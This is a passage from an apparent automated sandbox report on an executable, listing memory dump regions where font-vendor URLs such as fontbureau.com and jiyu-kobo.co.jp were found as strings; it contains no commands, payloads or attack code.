00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comdo
Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.come.comK
Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256684499.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comgrito
Source: iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comlic
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251960719.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252004043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.commnF0$
Source: iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.como
Source: iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comsivao
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comtoedK
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251839011.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251710288.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251678493.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comueo
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn.
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn5
Source: iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: iuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: iuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.html
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249550634.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/2
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/:
Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/U
Source: iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/X:
Source: iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0(
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ana
Source: iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/n
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/o
Source: iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: iuvRyl9i7D.exe, 00000000.00000003.249572897.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249496103.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249374645.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249531399.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249615233.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249355892.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249593017.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249472996.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249550634.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/xQ
